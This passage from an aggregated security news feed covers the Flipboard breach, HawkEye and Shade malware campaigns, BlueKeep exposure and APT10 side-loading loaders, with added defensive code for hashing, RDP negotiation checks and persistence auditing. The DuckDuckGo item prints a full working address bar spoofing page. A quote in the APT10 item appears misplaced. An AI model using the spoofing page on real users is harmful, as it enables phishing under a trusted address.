As much as your connection needs to be secure, your device needs its own shields too. Protect it by enabling the firewall. Its pop-up notifications may be annoying, but it blocks unsolicited inbound connections from other hosts on the network, which is exactly how network worms spread. Even if you prefer to keep the firewall off most of the time, enable it at least while using public Wi-Fi.

Anti-virus and anti-malware software is a must for device security. It protects your device from known malware and alerts you to suspicious activity. Keeping it up to date becomes even more crucial if you use public Wi-Fi often.

  • Forget the Network

Whenever you connect to a public Wi-Fi, remove the network and its saved password from your device when you leave. A saved network is usually rejoined automatically, without alerting you, the next time the device sees its name, and since the name is all the device checks on an open network, an attacker can broadcast that same name to lure your device onto a rogue access point.

To Conclude

Public Wi-Fi cannot be avoided completely. It lets you connect with the world while on the go, without paying any money, and it is available everywhere from universities to public buildings. Whether you are abroad on business or enjoying a vacation, free public Wi-Fi is certainly a blessing.

There are a number of threats associated with public Wi-Fi, especially networks without password protection, but you can keep yourself safe by following simple precautions. These tips protect you from the common tricks and scams of attackers. If you are a frequent public Wi-Fi user, you should also invest in a paid VPN and reputable anti-virus software for better security of your device and online transactions.




If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About the author: Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan's inbox is open for new ideas and stories; you can share story ideas at susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(Security Affairs – Public Wi-Fi, hacking)

The post Using Public Wi-Fi? Your data can be hacked easily! Here’s How… appeared first on Security Affairs.

News aggregator Flipboard disclosed a data breach

The news aggregator Flipboard announced that it suffered a breach, unauthorized users had access to some databases storing user account information.

The news and social media aggregator Flipboard disclosed on Tuesday that it suffered a breach, unauthorized users had access to some databases storing user information.

Hackers had access to the company systems between June 2, 2018, and March 23, 2019, and again on April 21-22, 2019. On April 23, the internal staff noticed suspicious activity in its infrastructure.

“We recently identified unauthorized access to some of our databases containing certain Flipboard users’ account information, including account credentials,” reads the incident notice published by Flipboard. “In response to this discovery, we immediately launched an investigation and an external security firm was engaged to assist. Findings from the investigation indicate an unauthorized person accessed and potentially obtained copies of certain databases containing Flipboard user information between June 2, 2018 and March 23, 2019 and April 21 – 22, 2019.”


Flipboard has more than 145 million users, and the intruder accessed, and potentially copied, databases holding their data. The exposed records include names, usernames, password hashes, email addresses and, for some users, the digital tokens used to access Flipboard through third-party services.

Flipboard said that most of the passwords were hashed with bcrypt, while the passwords of users who had not logged into their account since March 14, 2012 were still protected with uniquely salted SHA-1, a fast hash that is far cheaper to brute-force than bcrypt.

Flipboard has not found any evidence that the hackers accessed the third-party accounts connected to users' accounts; as a precaution, the company nonetheless replaced or deleted all digital tokens. The full extent of the breach is not yet clear, and the company forced a password reset for all its users.
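The two hashing schemes in the notice differ in how much each password guess costs an attacker, and the dormant accounts show the limit of the usual fix, rehashing on the next login: a user who never logs in never gets migrated. The block below is an added example written for this page, not Flipboard's code; it uses PBKDF2-SHA256 from the standard library as a stand-in for bcrypt, and the record format and the round count are assumptions.

```python
import hashlib
import hmac
import os

# Record formats are hypothetical; Flipboard's actual schema is not public.
LEGACY_ALG = "sha1_salted"     # what dormant (pre-March-2012) accounts were still using
MODERN_ALG = "pbkdf2_sha256"   # stand-in for bcrypt: hashlib only, no third-party module
PBKDF2_ROUNDS = 200_000        # assumption: tune so one verification costs tens of ms


def hash_legacy(password, salt=None):
    """Uniquely salted SHA-1, as on the dormant accounts. Fast, so cheap to brute-force."""
    salt = salt or os.urandom(16)
    digest = hashlib.sha1(salt + password.encode("utf-8")).digest()
    return {"alg": LEGACY_ALG, "salt": salt.hex(), "hash": digest.hex()}


def hash_modern(password, salt=None, rounds=PBKDF2_ROUNDS):
    """Slow, salted KDF: each guess costs the attacker `rounds` HMAC computations."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return {"alg": MODERN_ALG, "salt": salt.hex(), "hash": digest.hex(), "rounds": rounds}


def verify(record, password):
    """Constant-time comparison against whichever scheme the record was stored with."""
    salt = bytes.fromhex(record["salt"])
    if record["alg"] == LEGACY_ALG:
        candidate = hashlib.sha1(salt + password.encode("utf-8")).digest()
    elif record["alg"] == MODERN_ALG:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, record["rounds"])
    else:
        raise ValueError("unknown hash scheme %r" % record["alg"])
    return hmac.compare_digest(candidate, bytes.fromhex(record["hash"]))


def login(record, password):
    """Returns (ok, record). On a successful login a legacy record is rehashed, because the
    plaintext is only available at that moment; accounts that never log in stay on SHA-1,
    which is why a forced reset is the only remedy for dormant users after a breach."""
    if not verify(record, password):
        return False, record
    if record["alg"] == LEGACY_ALG:
        record = hash_modern(password)
    return True, record


if __name__ == "__main__":
    # Constructed sample: a user whose last login predates the bcrypt migration.
    stored = hash_legacy("correct horse battery staple")
    ok, stored = login(stored, "correct horse battery staple")
    print(ok, stored["alg"])   # True pbkdf2_sha256
```

Migration-on-login closes the gap only for active users; anything still stored under the legacy scheme when a database is copied has to be treated as crackable, which is the reason for resetting every account rather than only the bcrypt ones.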

The news aggregator pointed out that it does not collect government-issued identifiers or financial information, so the breach did not expose that class of data.

“Notably, Flipboard does not collect from users, and this incident did not involve, government issued IDs (such as Social Security numbers or driver’s license numbers), or payment card, bank account, or other financial information.” continues the security notice.

Flipboard reported the incident to the authorities and hired a security firm to help with the investigation.



Pierluigi Paganini

(SecurityAffairs – hacking, data breach)


HawkEye Keylogger is involved in attacks against business users

Experts at IBM X-Force observed a new campaign involving the HawkEye keylogger in April and May 2019 aimed at business users. 

Malware attacks leveraging a new variant of the HawkEye keylogger have been observed by experts at IBM X-Force. The malware has been under active development since at least 2013 and is offered for sale on various hacking forums as a keylogger and information stealer: it lets operators monitor infected systems and exfiltrate data.

The latest variant appeared in the cybercrime underground in December 2018, it was named HawkEyeReborn v9. The author is selling it through a licensing model and is also offering access to updates for specific periods of time.

“IBM X-Force researchers report an increase in HawkEye v9 keylogger infection campaigns targeting businesses around the world.” reads the analysis published by IBM X-Force. “In campaigns observed by X-Force in April and May 2019, the HawkEye malware focused on targeting business users, aiming to infect them with an advanced keylogging malware that can also download additional malware to their devices.”

In April 2019, threat actors launched numerous campaigns aimed at targeting industries such as transportation and logistics, healthcare, import and export, marketing, agriculture, and others. 

Attackers delivered the keylogger through malspam campaigns focused on business users. The messages pose as emails from a large Spanish bank, from other financial institutions or from legitimate companies.

“X-Force researchers note that the infection process is based on a number of executable files that leverage malicious PowerShell scripts.” continues the post.

Experts noticed that the malspam campaign originated from Estonia, while infections were observed worldwide.

“A few campaigns X-Force analyzed in April and May 2019 show that the infrastructure the malspam came from is hosted on similar assets.” the researchers conclude. “It is possible that HawkEye operators further pay for other services from the malware’s vendor, or from another cybercrime vendor serving up spamming campaigns.”



Pierluigi Paganini

(SecurityAffairs – HawkEye, hacking)

 


DuckDuckGo Address Bar Spoofing

The DuckDuckGo Privacy Browser application 5.26.0 for Android allows address bar spoofing via a setInterval call, as demonstrated by reloading every 50 ms.

Technical observation: the browser sits in the 5,000,000+ downloads tier on Google Play. It was observed that the DuckDuckGo Privacy Browser omnibar can be spoofed by a crafted JavaScript page that uses `setInterval` to reload the URL every 10 to 50 ms.

Proof of concept (Gist):

<!DOCTYPE html>
<html>
<head>
  <title>DuckDuckGo — Privacy, simplified.</title>
  <style>
    p.b { font-family: Arial, Helvetica, sans-serif; }
  </style>
</head>
<body bgcolor="#5DBCD2">
  <h1 style="text-align:center;">We definitely store your <br> personal information. Ever.</h1>
  <p class="b" style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal
  information to 3rd parties.</p>
  <img src="https://duckduckgo.com/assets/onboarding/bathroomguy/4-alpinist-v2.svg">
  <script>
    // Keep issuing a navigation to the real site every 50 ms: the omnibar shows
    // duckduckgo.com while this page's own content stays on screen.
    function fakefunction() { location = "https://duckduckgo.com/"; }
    setInterval(fakefunction, 50);
  </script>
</body>
</html>

The actual magic happens in `fakefunction()`: the crafted page keeps issuing a navigation to the real www.duckduckgo.com every 50 ms, so the omnibar displays the legitimate address while the page's own HTML, which can be modified at will, remains on screen.

The screenshot in the original post shows the successful attack.

Timeline:

This issue was submitted to the DuckDuckGo team via HackerOne on Oct 31st, 2018. DuckDuckGo rewarded it with swag on Nov 13th, 2018, but the report was closed without a fix and marked as informative, with the note that the team “doesn’t view it as a serious issue”. CVE-2019-12329 was later assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/05/duckduckgo-address-bar-spoofing.html



Pierluigi Paganini

(SecurityAffairs – Address Bar Spoofing, hacking)


Internet scans found nearly one million systems vulnerable to BlueKeep

Roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Yesterday I reported the discovery made by experts at GreyNoise that detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability.

The scans were first detected on May 25, 2019; experts explained that a single threat actor launched them from the Tor network to hide its identity.

Bad Packets researchers also observed scanning activity associated with BlueKeep; most of the requests originated from the Netherlands, Russia and China.

The vulnerability, tracked as CVE-2019-0708, affects Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is wormable, so malware authors can use it to build self-propagating code with WannaCry-like reach.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. On Windows 7 and Server 2008, enabling Network Level Authentication (NLA) blocks unauthenticated exploitation, because the attacker must authenticate before the vulnerable code is reached; an attacker holding valid credentials could still trigger the flaw, so NLA is a mitigation rather than a fix. Blocking TCP port 3389 at the perimeter also reduces exposure.

Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, founder of the zero-day broker Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Other experts, including Kaspersky, Check Point and MalwareTech, also announced that they have developed working exploits for BlueKeep.

Now the popular expert Robert Graham has scanned the Internet for vulnerable systems. He found more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan.

The initial masscan sweep took a couple of hours and returned 7,629,102 hosts with TCP port 3389 open, the candidates for running Remote Desktop.

“However, there is a lot of junk out there that’ll respond on this port. Only about half are actually Remote Desktop.” explained Graham.

“Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It’s a thousand times slower, but it’s only scanning the results from masscan instead of the entire Internet.”

The scan revealed 923,671 potentially vulnerable systems, and a large-scale attack in the coming weeks is likely.

“The upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug. Hackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines. ” Graham added.

Below are the detailed results of the scans conducted by the expert:

  • 1447579 UNKNOWN – receive timeout
  • 1414793 SAFE – Target appears patched
  • 1294719 UNKNOWN – connection reset by peer
  • 1235448 SAFE – CredSSP/NLA required
  • 923671 VULNERABLE – got appid
  • 651545 UNKNOWN – FIN received
  • 438480 UNKNOWN – connect timeout
  • 105721 UNKNOWN – connect failed 9
  • 82836 SAFE – not RDP but HTTP
  • 24833 UNKNOWN – connection reset on connect
  • 3098 UNKNOWN – network error
  • 2576 UNKNOWN – connection terminated

Summarizing, over 1.4 million machines appear patched and a further 1.2 million require NLA and therefore refuse unauthenticated connections; the nearly 4 million “UNKNOWN” results could not be classified either way.
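The “CredSSP/NLA required” bucket above comes from the very first RDP exchange: the client's X.224 Connection Request carries an RDP_NEG_REQ listing the security protocols it supports, and a server that enforces NLA answers an old-style client (one offering only standard RDP security) with RDP_NEG_FAILURE and the code HYBRID_REQUIRED_BY_SERVER. The block below is an added example, not code from rdpscan or from Graham's post; it builds that request, classifies the reply, and includes constructed sample replies so it runs offline. It only reports whether unauthenticated RDP is reachable, it does not test for CVE-2019-0708 itself (rdpscan continues into the MCS connect sequence to do that), and a host that requires NLA can still be exploited by an attacker with valid credentials until it is patched.

```python
import socket
import struct

# Negotiation constants from MS-RDPBCGR (RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE).
PROTOCOL_RDP = 0x00000000           # legacy "standard RDP security": no pre-auth at all
PROTOCOL_SSL = 0x00000001           # TLS
PROTOCOL_HYBRID = 0x00000002        # CredSSP, i.e. Network Level Authentication
TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005


def build_connection_request(requested=PROTOCOL_RDP, cookie=b"mstshash=probe"):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ.

    Offering only PROTOCOL_RDP mimics an NLA-incapable client; a server that enforces
    NLA must refuse it with RDP_NEG_FAILURE(HYBRID_REQUIRED_BY_SERVER)."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested)
    user_data = b"Cookie: " + cookie + b"\r\n" + neg_req
    # X.224 CR TPDU: length indicator, 0xE0 (CR, credit 0), DST-REF, SRC-REF, class option
    x224 = struct.pack(">BBHHB", 6 + len(user_data), 0xE0, 0, 0, 0) + user_data
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def classify_connection_confirm(data):
    """Map the server's X.224 Connection Confirm to a verdict in rdpscan's terms."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed response")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm (got 0x%02x)" % data[5])
    if tpkt_len < 19 or len(data) < 19:
        # No RDP_NEG_RSP/FAILURE at all: an old server that only speaks standard RDP
        # security, so the unauthenticated attack surface is reachable.
        return {"verdict": "LEGACY_RDP_ONLY", "detail": "no negotiation response"}
    neg_type, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
    if neg_type == TYPE_RDP_NEG_FAILURE:
        if value == HYBRID_REQUIRED_BY_SERVER:
            return {"verdict": "NLA_REQUIRED", "detail": "HYBRID_REQUIRED_BY_SERVER"}
        return {"verdict": "NEGOTIATION_FAILED", "detail": "failureCode=%d" % value}
    if neg_type == TYPE_RDP_NEG_RSP:
        if value == PROTOCOL_RDP:
            return {"verdict": "LEGACY_RDP_ACCEPTED",
                    "detail": "server chose standard RDP security; pre-auth surface exposed"}
        return {"verdict": "SECURED", "detail": "selectedProtocol=%d" % value}
    raise ValueError("unexpected negotiation type 0x%02x" % neg_type)


def probe(host, port=3389, timeout=5.0):
    """Send the request to a live host and classify the reply (network I/O; only run
    against systems you are authorised to test)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request())
        data = sock.recv(1024)
    return classify_connection_confirm(data)


# Constructed replies (not captures): TPKT header, X.224 CC, then the negotiation record.
SAMPLE_RESPONSES = {
    "nla":    b"\x03\x00\x00\x13\x0e\xd0\x00\x00\x12\x34\x00" + b"\x03\x00\x08\x00\x05\x00\x00\x00",
    "legacy": b"\x03\x00\x00\x13\x0e\xd0\x00\x00\x12\x34\x00" + b"\x02\x00\x08\x00\x00\x00\x00\x00",
    "old":    b"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00",
}

if __name__ == "__main__":
    for label, reply in SAMPLE_RESPONSES.items():
        print(label, classify_connection_confirm(reply))
```

Hosts classified LEGACY_RDP_ACCEPTED or LEGACY_RDP_ONLY are the ones where enabling NLA or blocking 3389 changes the picture immediately; the patch state still has to be confirmed separately.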

Finally, 0patch has released a micropatch for the BlueKeep vulnerability that administrators can deploy, without a reboot, to protect always-on servers.



Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)


Shade Ransomware is very active outside of Russia and targets more English-speaking victims

Experts at Palo Alto Networks spotted new Shade ransomware campaigns targeting new countries, including the U.S. and Japan.

Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.

Shade is considered one of the most dangerous threats on the cybercrime scene. It has been active at least since 2014, when a massive infection was observed in Russia. Shade infections increased in October 2018, kept a constant pace until the second half of December 2018, paused around Christmas, and then resumed in mid-January 2019 at double the previous volume.

“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Palo Alto Networks.

“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,” 

Most of the victims belong to the high-tech, wholesale and education sectors.

Shade has been distributed through malspam campaigns and exploit kits; experts pointed out that its executable (EXE) has remained “remarkably consistent” since its discovery in 2014.

Once a Windows system is infected, the ransomware sets the desktop background to announce the infection and drops ten text files on the Desktop, named README1.txt through README10.txt.

“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.


The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.

The researchers noticed that all the malspam campaigns spreading the Shade ransomware ultimately retrieved an executable file from a compromised server.

“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.

“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains Palo Alto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on portable executable (PE) files sent through a URL over TCP port 80.”

Experts discovered that most of the URLs hosting Shade executables were reported from customer devices outside Russia and Russian-speaking countries.

Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.



Pierluigi Paganini

(SecurityAffairs – Shade, ransomware, malware)


Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw

Several products made by Siemens Healthineers are affected by a recently patched Windows BlueKeep vulnerability (CVE-2019-0708).

The BlueKeep issue is a remote code execution vulnerability in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker who connects to the targeted system over RDP and sends specially crafted requests.

As explained by Microsoft, this vulnerability could be triggered by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

After Microsoft released the BlueKeep security updates, Siemens began assessing its Healthineers products. Siemens has now published six security advisories warning customers of the potential risks.

“Some Siemens Healthineers software products are affected by this vulnerability.” reads an advisory published by Siemens. “The exploitability of the vulnerability depends on the specific configuration and deployment environment of each product. Siemens Healthineers recommends installing the appropriate security patches released by Microsoft.”

The company pointed out that it cannot guarantee the compatibility of Microsoft security patches with products from Siemens Healthineers that are beyond their End of Support.


Impacted products include MagicLinkA, MagicView, Medicalis solutions, Screening Navigator, syngo solutions and teamplay (receiver software only).

For most of the products, the advisories suggest disabling RDP, blocking TCP port 3389, and implementing workarounds suggested by Microsoft.

Siemens also recommends ensuring that appropriate backups and system restoration procedures are in place, and suggests contacting the local Siemens Healthineers customer service engineer, portal or Regional Support Center for remediation guidance.



Pierluigi Paganini

(SecurityAffairs – Healthineers, BlueKeep)


APT10 is back with two new loaders and new versions of known payloads

The APT10 group has added two new malware loaders to its arsenal and used in attacks aimed at government and private organizations in Southeast Asia.

In April 2019, the China-linked cyber-espionage group tracked as APT10 added two new loaders to its arsenal and used them against government and private organizations in Southeast Asia.

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

In September 2018, researchers from FireEye uncovered and blocked a campaign by the Chinese APT10 cyber-espionage group aimed at the Japanese media sector.

The recent attacks were uncovered by experts at enSilo, who also noticed that the APT group used modified versions of known malware.

“Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group.” reads the analysis published by enSilo. “Both of the loader’s variants and their various payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10.”

The two loaders deliver different payloads to the victims and both variants drop the following files beforehand:

  • jjs.exe – legitimate signed executable, the command-line shell of the JVM-based JavaScript engine shipped with the Java platform, abused here as the host process for the malware loader
  • jli.dll – malicious DLL, picked up by jjs.exe in place of the legitimate library of the same name
  • msvcrt100.dll – legitimate Microsoft C Runtime DLL
  • svchost.bin – encrypted data file holding the payload

Both variants served several final payloads, including the PlugX and Quasar remote access trojan (RAT).


The loaders rely on DLL side-loading: a legitimate, signed executable is started, and because it resolves a library it depends on from its own directory, it loads the attacker's DLL of the same name instead.

Both loaders use jli.dll to map the data file svchost.bin into memory and decrypt it, yielding shellcode that is injected into svchost.exe and contains the actual malicious payload.

The two loaders differ in how they achieve persistence: the first installs itself as a service, while the second adds a Run registry key for the current user under the name “Windows Updata”.
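The persistence artefacts above are easy to hunt for on a host: a Run value whose name is a near-miss of a Windows component, a known side-loading host such as jjs.exe started from a user profile, or any autostart executable living in a user-writable directory. The script below is an added example for this page, not enSilo's tooling; the list of look-alike target names beyond “Windows Update”, the set of user-writable path markers and the sample entries are constructed assumptions. It reads HKCU\...\Run on Windows and falls back to the embedded sample elsewhere.

```python
import os
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Names an autostart entry tries to pass for. "Windows Update" is what the page's
# "Windows Updata" value imitates; the other two are assumptions.
LOOKALIKE_TARGETS = ["Windows Update", "Windows Defender", "Windows Security"]
# Directories a standard user can write to (assumption: typical Windows locations).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
# Legitimate signed binaries enSilo saw abused as DLL side-loading hosts.
SIDELOAD_HOSTS = {"jjs.exe"}


def levenshtein(a, b):
    """Edit distance; small values between a value name and a real component name are suspicious."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def executable_of(command):
    """First token of a Run-key command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def audit_run_entries(entries):
    """entries: iterable of (value_name, command). Returns [(name, command, [reasons])],
    entries with the most independent reasons first."""
    findings = []
    for name, command in entries:
        reasons = []
        exe = executable_of(command)
        base = os.path.basename(exe.replace("\\", "/")).lower()
        for target in LOOKALIKE_TARGETS:
            d = levenshtein(name.lower(), target.lower())
            if 0 < d <= 2:
                reasons.append("name looks like '%s' (edit distance %d)" % (target, d))
        if base in SIDELOAD_HOSTS:
            reasons.append("known side-loading host %s started from Run key" % base)
        if any(marker in exe.lower() for marker in USER_WRITABLE):
            # Noisy on its own (many legitimate per-user apps live in AppData); rank, don't alert.
            reasons.append("executable lives in a user-writable directory")
        if reasons:
            findings.append((name, command, reasons))
    findings.sort(key=lambda f: -len(f[2]))
    return findings


def read_run_key():
    """Collect HKCU Run values on Windows; returns [] on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            entries.append((name, str(data)))
    return entries


# Constructed sample, not a capture from an infected host.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("Windows Updata", r"C:\Users\alice\AppData\Roaming\jre\jjs.exe"),
]

if __name__ == "__main__":
    for name, command, reasons in audit_run_entries(read_run_key() or SAMPLE_ENTRIES):
        print(name, "->", command)
        for reason in reasons:
            print("   ", reason)
```

The first loader's service-based persistence needs a separate query of the Services registry hive or `Get-Service`; the same scoring idea (misspelled display name, binary path outside Program Files or System32) applies there.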

“It goes a long way to completely remove any sign of McAfee’s email proxy service from the infected machine,” Hunter said. “Besides killing the process, it also makes sure to delete any related keys in the registry, and recursively deletes any related files and directories on the machine. The same behavior was observed in the paranoid variant as part of a VBScript the dropper runs.”

Experts noticed that the payloads used in the latest campaigns are still in a development phase.

“Both variants of the loader implement the same decryption and injection mechanism.” the experts conclude.

Further technical details, including IoCs, are reported in the analysis published by enSilo.



Pierluigi Paganini

(SecurityAffairs – APT10, hacking)


BlueKeep scans observed from exclusively Tor exit nodes

GreyNoise experts detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability from exclusively Tor exit nodes.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including an RDS vulnerability dubbed BlueKeep that can be exploited to carry out WannaCry-like attacks.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker who connects to the targeted system over RDP and sends specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts at the SANS Institute